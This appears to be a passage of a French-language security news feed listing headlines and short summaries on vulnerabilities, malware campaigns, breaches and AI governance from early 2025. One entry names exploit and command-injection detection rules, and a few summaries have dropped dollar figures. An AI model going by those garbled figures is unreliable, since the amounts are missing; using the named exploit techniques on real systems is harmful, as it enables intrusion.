https://unit42.paloaltonetworks.com/vulnerabilities-in-iconics-software-suite/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Who is the DOGE and X Technician Branden Spikes?
At 49, Branden Spikes isn't just one of the oldest technologists who has been involved in Elon Musk's Department of Government Efficiency (DOGE). As the current director of information technology at X/Twitter and an early hire at PayPal, Zip2, Tesla and SpaceX, Spikes is also among Musk's most loyal employees. Here's a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon's cousin.
https://krebsonsecurity.com/2025/03/who-is-the-doge-and-x-technician-branden-spikes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Wrap-Up 03/06/2025
This week's Metasploit Wrap Up saw 3 new modules. Learn more about the enhancements, features, and bugs fixed.
https://blog.rapid7.com/2025/03/06/metasploit-wrap-up-03-06-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Data Leak Prevention? Benefits and Best Practices
Today's organizations work with incredible quantities of data. From corporate trade secrets to customers' and employees' personal information, much of this data is not fit for public consumption. But with growing volumes and complex IT environments, the potential for leakage is immense.
https://www.legitsecurity.com/blog/data-leak-prevention
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is an Identity Provider (IdP) and How Does It Work?
Managing online accounts shouldn't feel like a chore. But when so many websites and systems require credentials, it's hard to keep track.
https://www.legitsecurity.com/blog/identity-provider-idp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Patch Management Guide: Benefits and Best Practices
Developers periodically review software and release patches to remedy any bugs. When patches happen often, they can be hard to track.
https://www.legitsecurity.com/blog/patch-management-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Women's History Month: Why different perspectives in cybersecurity and AI matter more than ever before
This Women's History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers. Their diverse perspectives and talents are invaluable, driving innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this is what promotes business growth, strengthens global defenses, and enhances AI safety. The post Women's History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog....
https://www.microsoft.com/en-us/security/blog/2025/03/06/womens-history-month-why-different-perspectives-in-cybersecurity-and-ai-matter-more-than-ever-before/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What you need to know about South Korea's AI Basic Act
Originally published by Schellman&Co.   *Disclaimer: This article was written using a translated copy of the South Korea AI Basic Act*  After the European Union paved the way for creating a legal framework for artificial intelligence (AI) in early 2024, many wondered what government or jurisdiction would follow. The year continued with discussions on how to best implement AI governance and debates on where the line stands between sufficient governance and proper opportunit...
https://cloudsecurityalliance.org/articles/what-you-need-to-know-about-south-korea-s-ai-basic-act
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Ransomware to Regulation: Lessons from the Worst Year of Healthcare Cyber Breaches
Originally published by Censys.   In 2024, it's estimated that the two largest healthcare cyber incidents impacted over 100 million people, including patients and vendors across an interconnected digital landscape of insurers and healthcare providers. By October of 2024, 386 cybersecurity attacks had been reported in the U.S. against healthcare and 3rd-party providers, with Change Healthcare and Kaiser Permanente being among the most significant breaches. It has been, objectively, t...
https://cloudsecurityalliance.org/articles/from-ransomware-to-regulation-lessons-from-the-worst-year-of-healthcare-cyber-breaches
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malvertising campaign leads to info stealers hosted on GitHub
Microsoft detected a large-scale malvertising campaign in early December 2024 that impacted nearly one million devices globally. The attack originated from illegal streaming websites embedded with malvertising redirectors and ultimately redirected users to GitHub to deliver initial access payloads as the start of a modular and multi-stage attack chain. The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware threat mailed in letters to business owners
CEOs and business owners received personal, customized ransomware threats in a series of letters sent in the mail through USPS.
https://www.malwarebytes.com/blog/news/2025/03/ransomware-threat-mailed-in-letters-to-business-owners
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Android Malware & Security Issue 1st Week of March, 2025
ASEC Blog publishes “Android Malware & Security Issue 1st Week of March, 2025”
https://asec.ahnlab.com/en/86652/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rust in the enterprise: Best practices and security considerations
As Rust programming language adoption continues to grow, enterprises are beginning to integrate it into their development ecosystems.
https://www.sonatype.com/blog/rust-in-the-enterprise-best-practices-and-security-considerations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Best 100 Cybercrime Podcasts
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full list in MillionPodcasts Sausalito, Calif. – Mar. 6, 2025 MillionPodcasts, who calls itself the ultimate destination for podcast media contacts, recently released a list of the best 100 cybercrime podcasts. The Cybercrime Magazine Podcast, The post The Best 100 Cybercrime Podcasts appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-best-100-cybercrime-podcasts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Legit SLA Management & Governance – Built for Enterprise-Scale AppSec
Get details on Legit's powerful SLA management capabilities.
https://www.legitsecurity.com/blog/legit-sla-management-and-governance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

KnowBe4 Wins Cybersecurity Company of the Year at the 2025 teissAwards
KnowBe4, the world-renowned cybersecurity platform that comprehensively addresses human risk management, today announced that it has been awarded first place in this year's teissAwards Cybersecurity Company of the Year category for enterprise organisations. The teissAwards celebrate excellence in cyber and information security, recognising the outstanding contributions of vendors and technologies over the past year. Winning first place […] The post KnowBe4 Wins Cybersecurity Company of the Year at the 2025 teissAwards appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/06/knowbe4-wins-cybersecurity-company-of-the-year-at-the-2025-teissawards/?utm_source=rss&utm_medium=rss&utm_campaign=knowbe4-wins-cybersecurity-company-of-the-year-at-the-2025-teissawards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Next Level: Typo DGAs Used in Malicious Redirection Chains
A graph intelligence-based pipeline and WHOIS data are among the tools we used to identify this campaign, which introduced a variant of domain generation algorithms. The post The Next Level: Typo DGAs Used in Malicious Redirection Chains appeared first on Unit 42.
https://unit42.paloaltonetworks.com/typo-domain-generation-algorithms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Enterprises Should Consider Replacing Employees' Home TP-Link Routers
An examination of CVE trends from February 2025 scanning data.
https://www.f5.com/labs/articles/threat-intelligence/enterprises-should-consider-replacing-employees-home-tp-link-routers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trojans disguised as AI: Cybercriminals exploit DeepSeek's popularity
Kaspersky experts have discovered campaigns distributing stealers, malicious PowerShell scripts, and backdoors through web pages mimicking the DeepSeek and Grok websites.
https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Citrix NetScaler ADC and NetScaler Gateway Unauthenticated Remote Code Execution Vulnerability (CVE-2023-3519)
What is Citrix NetScaler ADC and NetScaler Gateway?Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic. Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access. What is the Attack?According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products. For these products to be vulnerable, they must be configured either as a gateway or as an authentication, authorization, and auditing (AAA) virtual server. The advisory also confirms that Citrix-managed servers have already been mitigated,...
https://fortiguard.fortinet.com/threat-signal-report/5227
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ivanti Connect Secure Zero-Day Vulnerability
What are the Vulnerabilities?Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. CVE-2025-0282 is an unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Successful exploitation could result in unauthenticated remote code execution and CVE-2025-0283 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a local authenticated attacker to escalate their privileges.According to a blog released by Mandiant, it has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. Ivanti Connect...
https://fortiguard.fortinet.com/threat-signal-report/5612
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Understanding UEBA: Essential Guide to User and Entity Behavior Analytics in Cybersecurity
Originally published by InsiderSecurity.   Visibility into user actions is one of the critical challenges in the modern digital landscape. Traditional rule-based security solutions that generate a high number of alerts within modern environments are no longer practical; a new approach is needed. This is where User and Entity Behavior Analytics (UEBA) emerges as a critical security component, providing cybersecurity teams with visibility into user behaviors. Powered by technologies ...
https://cloudsecurityalliance.org/articles/understanding-ueba-essential-guide-to-user-and-entity-behavior-analytics-in-cybersecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why GRC is key to safely unlocking ROI from design, hosting, and AI
Originally published by Scrut Automation.   What's the one thing businesses want from their software investments? Quick results. According to G2's State of Software Report 2024, tools in design, hosting, and AI categories are leading the way in delivering faster ROI than any other software. And it's no surprise—these tools are designed to fuel creativity, streamline operations, and drive business impact at unprecedented speed. With Governance, Risk, and Compliance (GRC) ranking h...
https://cloudsecurityalliance.org/articles/why-grc-is-key-to-safely-unlocking-roi-from-design-hosting-and-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransom & Dark Web Issues Week 1, March 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 1, March 2025           SSH and DNS access rights of the world’s second-largest instant noodle brand company are being sold on BreachForums Pro-Russian hacktivist SECT0R16 claims to have hacked the greenhouse environment control equipment system in Jeonju, South Korea Ransomware group Fog […]
https://asec.ahnlab.com/en/86643/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trends Report on Phishing Emails in February 2025
This report provides statistics, trends, and case details on the distribution volume and attachment threats of phishing emails collected and analyzed in February 2025. The following is a part of the statistics and cases included in the original report. 1. Phishing Email Threat Statistics In February 2025, the most common type of threat among phishing […]
https://asec.ahnlab.com/en/86685/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Inside the Take Command Summit 2025 Agenda: What's in Store for This Year's Event?
Join Take Command 2025, a free virtual cybersecurity event on April 9. Hear from industry experts on AI-driven security, real-world attack simulations, and frontline SOC threat hunting strategies. Register now!
https://blog.rapid7.com/2025/03/05/inside-the-take-command-summit-2025-agenda-whats-in-store-for-this-years-event/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Organizations can shrink their attack surface by over 7,000 times
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Security InfoWatch Sausalito, Calif. – Mar. 5, 2025 “If Global Cybercrime Inc. traded on a stock exchange, I would buy it because its growth trajectory over the past decade has been breathtaking,” The post Organizations can shrink their attack surface by over 7,000 times appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/organizations-can-shrink-their-attack-surface-by-over-7000-times/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

November 2024 Cyber Attacks Statistics
In November 2024, Cyber Crime continued to lead the Motivations chart with 72%, up from 68% of October. Operations driven...
https://www.hackmageddon.com/2025/03/05/november-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Beneath the Surface: Detecting and Blocking Hidden Malicious Traffic Distribution Systems
A topological analysis and case studies add nuance to a study of malicious traffic distribution systems. We compare their use by attackers to benign systems. The post Beneath the Surface: Detecting and Blocking Hidden Malicious Traffic Distribution Systems appeared first on Unit 42.
https://unit42.paloaltonetworks.com/detect-block-malicious-traffic-distribution-systems/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Silk Typhoon targeting IT supply chain
Silk Typhoon is a Chinese state actor focused on espionage campaigns targeting a wide range of industries in the US and throughout the world. In recent months, Silk Typhoon has shifted to performing IT supply chain attacks to gain access to targets. In this blog, we provide an overview of the threat actor along with insight into their recent activity as well as their longstanding tactics, techniques, and procedures (TTPs), including a persistent interest in the exploitation of zero-day vulnerabilities in various public-facing appliances and moving from on-premises to cloud environments. The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool
Attackers blackmail YouTubers with complaints and account blocking threats, forcing them to distribute a miner disguised as a bypass tool.
https://securelist.com/silentcryptominer-spreads-through-blackmail-on-youtube/115788/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Auto-Color Linux Malware Targets Universities, Government Organizations
A new threat to Linux systems is active in the wild, targeting universities and government… New Auto-Color Linux Malware Targets Universities, Government Organizations on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/new-auto-color-linux-malware-targets-universities-government-organizations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Retires Skype, Asks Users To Switch To Teams Free
The popular chat app Skype's demise is now official. Microsoft recently asked all users to… Microsoft Retires Skype, Asks Users To Switch To Teams Free on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/microsoft-retires-skype-asks-users-to-switch-to-teams-free/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Thousands of Misconfigured AMS Risk Buildings' Security Globally
Researchers found thousands of misconfigured access management systems (AMS) exposing sensitive data online. These misconfigured… Thousands of Misconfigured AMS Risk Buildings' Security Globally on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/thousands-of-misconfigured-ams-risk-buildings-security-globally/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Meta Fired Employees For Alleged Information Leaks
After expressing concern for some time, Mark Zuckerberg, the brain behind Meta (formerly Facebook), showed… Meta Fired Employees For Alleged Information Leaks on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/meta-fired-employees-for-alleged-information-leaks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Australia Bans Kaspersky Products From Government Systems
After other countries, Australia also steps in against Kaspersky, deeming it a security risk. In… Australia Bans Kaspersky Products From Government Systems on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/australia-bans-kaspersky-products-from-government-systems/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Implementing CCM: Cryptography, Encryption, and Key Management
The Cloud Controls Matrix (CCM) is a framework of controls (policies, procedures, and technical measures) that are essential for cloud computing security. It is created and updated by CSA and aligned to CSA best practices. You can use CCM to systematically assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service provide...
https://cloudsecurityalliance.org/articles/implementing-ccm-cryptography-encryption-and-key-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hitachi Vantara Pentaho BA Server Vulnerabilities
What is the Vulnerability?Threat actors are actively exploiting vulnerabilities in the Hitachi Vantara Pentaho Business Analytics Server. FortiGuard network sensors have detected attack attempts on over 500 devices, and CISA has added these vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation.The Pentaho Business Analytics Server is widely used, trusted by 73% of Fortune 100 companies, and plays a crucial role in data analysis and business intelligence.Affected VulnerabilitiesCVE-2022-43939: Hitachi Vantara Pentaho BA Server Authorization Bypass VulnerabilityCVE-2022-43769: Hitachi Vantara Pentaho BA Server Special Element Injection VulnerabilityWhat is the recommended Mitigation?Apply the latest patch or update from the vendor. [CVE-2022-43769...
https://fortiguard.fortinet.com/threat-signal-report/6025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Your complete SaaS security guide—with best practices for ensuring it
Originally published by Vanta.   SaaS security requires constantly monitoring and preparing to mitigate the latest industry threats and vulnerabilities. According to the 2024 State of SaaS Security Report, 58% of organizations experienced a SaaS security incident in the past year despite having high confidence levels in their existing security programs. ‍ Today, SaaS applications are among the most common targets of cyberattacks, which is why they require an elaborate, multi...
https://cloudsecurityalliance.org/articles/your-complete-saas-security-guide-with-best-practices-for-ensuring-it
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Comedy Can Tell Us About AI and Big Data
Originally published by CXO REvolutionaries. Written by Jay Patty, CTO in Residence, Zscaler.   Knock, Knock. Who's there? Data. Data who?  Data gonna help us stop the next cyber-attack, thanks to telemetry and analytics Corny, right? Well, sometimes, the easiest way to unpack complexity is through humor. Think about it: what's funnier (or scarier) than watching John Oliver skewer data brokers or the runaway success of ransomware actors? In the same w...
https://cloudsecurityalliance.org/articles/what-comedy-can-tell-us-about-ai-and-big-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Questions Every Company Should Be Asking About AI
Originally published by Truyo.   The trajectory of and rapidly advancing regulatory landscape around AI is reminiscent of privacy which, years ago, left companies scrambling to figure out what they needed to do, who is managing compliance, and what regulations they may be subject to, both existing and upcoming. As companies begin to navigate these uncharted waters, we've put together 4 questions every organization should be asking and answering to begin AI governance.   1. Do...
https://cloudsecurityalliance.org/articles/the-questions-every-company-should-be-asking-about-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing generative AI models on Azure AI Foundry
Discover how Microsoft secures AI models on Azure AI Foundry, ensuring robust security and trustworthy deployments for your AI systems. The post Securing generative AI models on Azure AI Foundry appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/04/securing-generative-ai-models-on-azure-ai-foundry/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Multiple Zero-Day Vulnerabilities in Broadcom VMware ESXi and Other Products
On Tuesday, March 4, 2025, Broadcom published a critical security advisory (VMSA-2025-0004) on 3 new zero-day vulnerabilities affecting multiple VMware products, including ESXi, Workstation, and Fusion.
https://blog.rapid7.com/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New AI-Powered Scam Detection Features to Help Protect You on Android
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse Google has been at the forefront of protecting users from the ever-growing threat of scams and fraud with cutting-edge technologies and security expertise for years. In 2024, scammers used increasingly sophisticated tactics and generative AI-powered tools to steal more than trillion from mobile consumers globally, according to the Global Anti-Scam Alliance. And with the majority of scams now delivered through phone calls and text messages, we've been focused on making Android's safeguards even more intelligent with powerful Google AI to help keep your financial information and data safe. Today, we're launching two new industry-leading...
http://security.googleblog.com/2025/03/new-ai-powered-scam-detection-features.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation
Boston and Tel Aviv, United States, 4th March 2025, CyberNewsWire Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/04/hunters-announces-new-ai-capabilities-with-pathfinder-ai-for-smarter-soc-automation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The hidden threat: Tackling malware in your software supply chain
The value of open source is undeniable — 90% of all modern software development depends on it. According to Harvard Business School, in 2024 alone, more than 6 trillion open source software components were downloaded, representing almost trillion in value to users.
https://www.sonatype.com/blog/the-hidden-threat-tackling-malware-in-your-software-supply-chain
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Analysis of Lazarus Group's Attack on Windows Web Servers
AhnLab SEcurity intelligence Center (ASEC) has identified attack cases of the Lazarus group breaching a normal server and using it as a C2. Attacks that install a web shell and C2 script on South Korean web servers continue to occur. Additionally, there are cases where LazarLoader malware and privilege escalation tools are identified.   1. […]
https://asec.ahnlab.com/en/86687/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Weekly Detection Rule (YARA and Snort) Information – Week 1, March 2025
The following is the information on Yara and Snort rules (week 1, March 2025) collected and shared by the AhnLab TIP service. 1 YARA Rules Detection name Description Source sig_27244_metasploit_hta_stager file UsySLX1n.hta https://github.com/The-DFIR-Report/Yara-Rules 23 Snort Rules Detection name Source ET WEB_SPECIFIC_APPS Paessler PRTG Notification Command Injection Attempt (CVE-2018-9276) https://rules.emergingthreatspro.com/open/ ET EXPLOIT Exim SQLite (DBM) Injection […]
https://asec.ahnlab.com/en/86614/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building a High Performance Team in India: Meet Swami Nathan
Swami Nathan has a track record of building new teams from scratch for global companies. Through his experiences, he's identified what it takes to build not just any team, but a high performing team that drives innovation for business while propelling career trajectories for those who take the ride.
https://blog.rapid7.com/2025/03/04/building-a-high-performance-team-in-india-meet-swami-nathan/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Case for More Women in Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in CFOtech Sausalito, Calif. – Mar. 4, 2025 Cybersecurity is evolving rapidly, and so is the need for diverse perspectives. By 2031, women are expected to hold 35 percent of cybersecurity jobs The post The Case for More Women in Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-case-for-more-women-in-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A.I in Cybersecurity: Revolutionizing Threat Detection and Response
Written by Abel E. Molina, Cybersecurity Architect, Softchoice.   There's nothing to fear, than fear itself” – T.Roosevelt How Artificial Intelligence is Reshaping Security Measures In an era where cyber threats are becoming increasingly sophisticated, the need for advanced security measures has never been more critical. Enter artificial intelligence (AI) – a game-changer in the realm of cybersecurity. AI is revolutionizing how we detect and respond to threats, enhanci...
https://cloudsecurityalliance.org/articles/a-i-in-cybersecurity-revolutionizing-threat-detection-and-response
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Agents: Human or Non-Human?
Originally published by Oasis Security. Written by Marta Dern.   During CES 2025, Jensen Huang (CEO of NVIDIA) stated in his keynote:  ... In the future these AI agents are essentially digital workforce that are working alongside your employees doing things for you on your behalf, and so the way that you would bring these special agents into your company is to onboard them just like you onboard an employee. This vision raises a fundamental question for Identity S...
https://cloudsecurityalliance.org/articles/ai-agents-human-or-non-human
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Credential Management? Best Practices and Examples
Strong credentials safeguard your digital resources, but common mistakes like weak passwords, credential reuse, and exposed secrets give attackers an easy path to unauthorized access.
https://www.legitsecurity.com/blog/credential-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Code Scanning? Approaches and Best Practices
Identifying security flaws early in the software development lifecycle (SDLC) prevents vulnerabilities from reaching production, where they become more complex and expensive to fix. Integrating automated code scanning into development workflows allows you to catch issues as they arise, providing a more secure and stable codebase.
https://www.legitsecurity.com/blog/code-scanning-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

6 Effective Secret Scanning Tools
Secret scanning tools identify and protect sensitive information that may be exposed within software assets. Developers often embed secrets like API keys, database credentials, and encryption keys in source code—but if left unprotected, these can serve as direct entry points for attackers. 
https://www.legitsecurity.com/blog/secret-scanning-tools
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Video Report: Women Hold 30 Percent Of Jobs In Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine –Watch the YouTube Video Sausalito, Calif. – Mar. 3, 2025 Cybersecurity Ventures predicts that women will represent 30 percent of the global cybersecurity workforce by the end of 2025, increasing to 35 percent by 2031. Women The post Video Report: Women Hold 30 Percent Of Jobs In Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/video-report-women-hold-30-percent-of-jobs-in-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Uncovering .NET Malware Obfuscated by Encryption and Virtualization
Malware authors use AES encryption and code virtualization to evade sandbox static analysis. We explore how this facilitates spread of Agent Tesla, XWorm and more. The post Uncovering .NET Malware Obfuscated by Encryption and Virtualization appeared first on Unit 42.
https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mobile malware evolution in 2024
The most notable mobile threats of 2024, and statistics on Android-specific malware, adware and potentially unwanted software.
https://securelist.com/mobile-threat-report-2024/115494/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Color Dating - 220,503 breached accounts
In September 2018, the dating app to match people with different ethnicities Color Dating suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 220k unique email addresses along with bios, names, profile photos and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "ANK (Veles)".
https://haveibeenpwned.com/PwnedWebsites#ColorDating
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Flat Earth Sun, Moon and Zodiac App - 33,294 breached accounts
In October 2024, the flat earth sun, moon and zodiac app created by Flat Earth Dave was found to be leaking extensive personal information of its users. The data included 33k unique email addresses along with usernames, latitudes and longitudes (their position on the globe) and passwords stored in plain text. A small number of profiles also contained names, dates of birth and genders.
https://haveibeenpwned.com/PwnedWebsites#FlatEarthDave
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Palo Alto PAN-OS Authentication Bypass
What is the Vulnerability?A recent authentication bypass vulnerability (CVE-2025-0108) in the Palo Alto Networks PAN-OS software is under active exploitation as has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog. Successful exploitation of CVE-2025-0108 enables an unauthenticated attacker with network access to the management web interface to bypass the authentication required by the PAN-OS management web interface and invoke certain PHP scripts that can impact its integrity and confidentiality. According to the vendor advisory, Palo Alto Networks has observed exploit attempts chaining CVE-2025-0108 with CVE-2024-9474 and CVE-2025-0111 on unpatched and unsecured PAN-OS web management interfaces. A detailed Outbreak report including the attack using CVE-2024-9474 was released...
https://fortiguard.fortinet.com/threat-signal-report/6019
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Notorious Malware, Spam Host “Prospero” Moves to Kaspersky Lab
One of the most notorious providers of abuse-friendly "bulletproof" web hosting for cybercriminals has started routing its operations through networks run by the Russian antivirus and security firm Kaspersky Lab, KrebsOnSecurity has learned.
https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Enhancing Cybersecurity with RSM: A Deep Dive into Managed Security Services
Expert Insights on the Role of AI and Automation in Enhancing Cybersecurity Resiliency – Vlad Babiuk, Director of Competitive Technical Product Marketing San Jose, Calif. – Feb. 28, 2025 Resiliency is an increasingly important concept in cybersecurity. Vendors are increasingly using AI and automation to The post Enhancing Cybersecurity with RSM: A Deep Dive into Managed Security Services appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/enhancing-cybersecurity-with-rsm-a-deep-dive-into-managed-security-services/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Weekly Wrap-Up: 02/28/2025
This week's Metasploit Weekly Wrap-Up saw 5 new modules. One module adds credential harvesting for MySCADA MyPro Manager using CVE-2025-24865 & CVE-2025-22896.
https://blog.rapid7.com/2025/02/28/metasploit-weekly-wrap-up-02-28-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

JavaGhost's Persistent Phishing Attacks From the Cloud
Unit 42 reports on phishing activity linked to the threat group JavaGhost. These attacks target organizations' AWS environments. The post JavaGhost's Persistent Phishing Attacks From the Cloud appeared first on Unit 42.
https://unit42.paloaltonetworks.com/javaghost-cloud-phishing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The SOC files: Chasing the web shell
Kaspersky SOC analysts discuss a recent incident where the well-known Behinder web shell was used as a post-exploitation backdoor, showing how web shells have evolved.
https://securelist.com/soc-files-web-shell-chase/115714/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Spyzie - 518,643 breached accounts
In February 2025, the spyware service Spyzie suffered a data breach along with sibling spyware services, Spyic and Cocospy. The Spyzie breach alone exposed almost 519k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyzie
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why MDR In 2025 Is About Scaling With Purpose
Forrester recently released “The Forrester Wave™: Managed Detection and Response (MDR) Services, Q1 2025,", highlighting the top 10 MDR providers out of more than 600 worldwide.
https://blog.rapid7.com/2025/02/27/why-mdr-in-2025-is-about-scaling-with-purpose/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The 2025 State of Application Risk Report: Understanding Toxic Combinations in Application Security
Get details on the most common toxic combinations Legit unearthed in enterprises' software factories.
https://www.legitsecurity.com/blog/understanding-toxic-combinations-in-application-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-30 November 2024 Cyber Attacks Timeline
In the second timeline of November 2024 I collected 117 events (7.8 events/day) with a threat landscape dominated by malware
https://www.hackmageddon.com/2025/02/27/16-30-november-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Squidoor: Suspected Chinese Threat Actor's Backdoor Targets Global Organizations
We analyze the backdoor Squidoor, used by a suspected Chinese threat actor to steal sensitive information. This multi-platform backdoor is built for stealth. The post Squidoor: Suspected Chinese Threat Actor's Backdoor Targets Global Organizations appeared first on Unit 42.
https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

